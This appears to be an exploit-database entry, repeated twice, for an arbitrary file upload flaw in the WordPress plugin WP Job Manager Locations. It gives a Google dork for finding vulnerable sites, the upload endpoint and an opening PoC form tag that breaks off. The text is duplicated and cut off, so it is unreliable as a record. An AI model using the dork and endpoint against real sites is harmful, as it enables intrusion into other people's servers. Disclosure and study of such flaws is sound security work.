# Google Dork: Index of /wp-content/plugins/wp-job-manager-locations
# Date: 4 June 2017
# Exploit Author: AlHikam AM
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://id.wordpress.org/plugins/wp-job-manager-locations/
# Tested on: Windows 7
1. Google Dorking
2. Exploit the websites
https://localhost/jm-ajax/upload_file/
3. Vulnerability?
FormCraft {"files":[]}
4. PoC :
<form method="POST"...
WordPress Plugins WP Job Manager Locations - Arbitrary File Upload
# Date: 4 June 2017
# Exploit Author: AlHikam AM
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://id.wordpress.org/plugins/wp-job-manager-locations/
# Tested on: Windows 7
1. Google Dorking
2. Exploit the websites
https://localhost/jm-ajax/upload_file/
3. Vulnerability?
FormCraft {"files":[]}
4. PoC :
<form method="POST"...
WordPress Plugins WP Job Manager Locations - Arbitrary File Upload